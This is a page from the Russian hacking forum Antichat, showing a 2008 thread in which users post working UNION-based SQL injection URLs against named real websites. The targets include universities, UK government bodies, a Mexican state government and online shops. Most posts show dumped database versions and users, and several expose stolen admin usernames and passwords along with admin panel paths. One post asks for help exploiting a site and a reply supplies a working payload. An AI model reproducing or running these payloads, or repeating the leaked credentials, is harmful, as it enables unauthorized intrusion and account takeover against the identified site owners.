ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7091  
Старый 13.12.2008, 17:33
Аватар для Thrasher88
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

www.peoples.ru - крупное интернет издание
Цитата:
http://www.peoples.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,v ersion(),user(),database()),11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38--%20%201
Version: 5.0.45-log
USER: alexrus@89.108.84.125
Database: peoplesru
 
Ответить с цитированием

  #7092  
Старый 13.12.2008, 17:49
Аватар для masternet
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

https://secure1.ilisys.com.au/great/order.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),ve rsion(),user(),database()),6--
4.1.21-standard-log - great@117.104.160.65 - great_db
------------------
http://www.navimeteo.eu/order.php?ID=-1+union+select+1,concat_ws(char(32,45,32),Username ,Password,testoMail,refMail,mail2,contratto,contra tto_eng,contratto_ita,allegato_eng,allegato_ita,br ochure_ita,brochure_eng,last_access,last_ip),3,4,5 ,6+from+nav_settings--
http://www.navimeteo.eu/admin nav0609:rfz278hj
-------------------------
http://www.artworksisrael.com/order.php?id=-1+union+select+1,2,3,4,5,concat_ws(char(32,45,32), version(),user(),database()),7,8,9,10,11,12,13,14, 15--
5.0.32-Debian_7etch8-log - aistore@localhost - aistore
----------------
http://zhdkrecords.zhdk.ch/order.php?ID=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6--
5.0.32-Debian_7etch6-log - hmtzrecords@localhost - hmtzrecords
-------------------
http://dtv.horizont.by/index.php?id=news&n=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5--
4.1.22-standard - dtvhori_user@localhost - dtvhori_dtvdb
-----------------------
http://siovizcenter.ucsd.edu/library/objects/detail.php?ID=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24--
4.1.22-log - viz_php@localhost - sioviz
PR: 6
---------------
http://www.lrdc.pitt.edu/people/person-detail.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2,3,4--
4.1.22-log - lrdc@ewi-dept-02.cssd.pitt.edu - lrdc-site
ТИЦ : 10 PR: 6
-----------------------
http://www.magindustries.com/detail.php?id=-1+union+select+1,2,3,4,unhex(hex(concat_ws(char(32 ,45,32),user_id,user_name,user_login,user_password ,user_level))),6,7+from+users+limit+0,1--
http://www.magindustries.com/detail.php?id=-1+union+select+1,2,3,4,unhex(hex(concat_ws(char(32 ,45,32),user_id,user_name,user_login,user_password ,user_level))),6,7+from+users+limit+1,1--
http://www.magindustries.com/admin
http://www.magindustries.com/cpanel
к админкам не конектит(
http://www.magindustries.com/detail.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),ve rsion(),user(),database()),6,7--
5.0.67-community - magind_dbguy@localhost - magind_main
--------------------
http://www.nwce.gov.uk/view_event.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17--
4.1.22-standard-log - nwce@localhost - nwce
--------------------
http://www.bbaa.org.uk/index.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database())--
5.0.67-log - bbaa@localhost - bbaa
PR - 6
------------------------
http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4,5,6,7,8,9,10,11,12,13--
4.0.27-standard-log - dbo120565932@212.227.119.149 - db120565932
ТИЦ - 30
------------------
http://www.norwichplayhouse.org.uk/viewshowdetail.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15--
4.0.23-standard - norwichp@localhost - norwichp_play
PR - 5
-----------------
http://www.worksmart.org.uk/jargonbuster/index.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2--
4.1.20 - worksmart@localhost - tuc
ТИЦ : 70 PR: 6
----------------
http://www.monitor-nhsft.gov.uk/publications.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( %20),user(),database()),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19--
5.0.54 - monitor@localhost - nhsftreg
ТИЦ : 10 PR: 5
----------------
http://old.cs.ncl.ac.uk/people/home.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27--
5.0.45 - csReader@localhost - CompSci
PR: 4
---------------------------
http://www.gower-boat-trips.co.uk/home.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(32,4 5,32),version(),user(),database()),10,11,12--
4.1.22-STANDARD - GOWER_ADVENTURER@LOCALHOST - GOWER_COAST
--------------------

Последний раз редактировалось masternet; 14.12.2008 в 01:43..
 
Ответить с цитированием

  #7093  
Старый 14.12.2008, 02:40
Аватар для d1aVOL
d1aVOL
Познающий
Регистрация: 29.07.2007
Сообщений: 49
Провел на форуме:
279583

Репутация: 7
По умолчанию

http://www.ansti.org/order.php?id=-1+union+select+1,2--
4.1.22-standard
ansti@localhost
ansti_anstiorg
 
Ответить с цитированием

  #7094  
Старый 14.12.2008, 02:48
Аватар для masternet
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

http://www.genetics.wisc.edu/faculty/profile.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database())--
5.0.26-log — anon_read@zotz.genetics.wisc.edu — registry
ТИЦ : 40 PR: 7
-----------------
http://www.mrc.uidaho.edu/mrc/team/printPeople.php?ID=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
4.0.20-debug-debug - smit
ТИЦ : 50 PR: 5
-------------------
 
Ответить с цитированием

  #7095  
Старый 14.12.2008, 15:55
Аватар для buxhost
buxhost
Новичок
Регистрация: 08.12.2008
Сообщений: 7
Провел на форуме:
169639

Репутация: 1
По умолчанию

http://goodbux.buxhost.ru/login.php?'
Есть ли тут инъекция, если да то как можно её раскрутить
:::::::::: есть таблицы ::::::::::::
* tb_ads
* tb_ads_categories
* tb_advertisers
* tb_buyref
* tb_cheaters
* tb_checkfaq
* tb_clickpack
* tb_config
* tb_contact
* tb_history
* tb_messenger
* tb_payme
* tb_refset
* tb_site
* tb_upgrade
* tb_users
* users_online
 
Ответить с цитированием

  #7096  
Старый 14.12.2008, 17:36
Аватар для ThreeD
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

DE Shop'ы

www.salesafter.de

Цитата:
http://www.salesafter.de/index.php?id=-62+union+select+1,2,concat_ws(0x3A3a,version(),dat abase()),4,5,6,7,8,9,10,11,12,13/*
4.0.27-max-log::db103929080
______________________________

www.schuetzenbund.de

Цитата:
http://www.schuetzenbund.de/shop/list.php?id=-21'+union+select+1,concat_ws(0x3A3a,name,password) ,3,4,5,6,7,8,9+from+user/*
admin::sh00ting

5.0.32-Debian_7etch8-log

Последний раз редактировалось ThreeD; 14.12.2008 в 18:35..
 
Ответить с цитированием

  #7097  
Старый 14.12.2008, 19:01
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.chiapas.gob.mx/funcionarios/listado-servidores-entidad.php?id=-1+union+select+concat_ws(0x3a3a,usuario,password,d atabase()),2,3,4,5,6,7,8,9,10,11,12+from+usuarios+ limit+0,1/*

login: jlmorales
pass: mo222530


http://www.chiapas.gob.mx/admin/


ПОХЕК )))
 
Ответить с цитированием

  #7098  
Старый 14.12.2008, 19:17
Аватар для masternet
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

http://www.aupe.org/in_the_news/news.php?id=-1+union+select+1,2,password,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21+from+admin--
KJa6hDJQyb
логина не нашёл
4.0.18
 
Ответить с цитированием

  #7099  
Старый 14.12.2008, 19:24
Аватар для F4R
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

народ, помогите плиз)
Цитата:
http://www.bastion-vlg.ru/ask/?id=1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25%20/*
до 35 даже перебирал) никак неподбирается,.. чё делать?
 
Ответить с цитированием

  #7100  
Старый 14.12.2008, 19:28
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

http://www.bastion-vlg.ru/ask/?id=1+union+select+1,2,3,4,5,6,7,8,version()+--+

PS В следующий раз вопросы в соседней ветке, пожалуйста
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ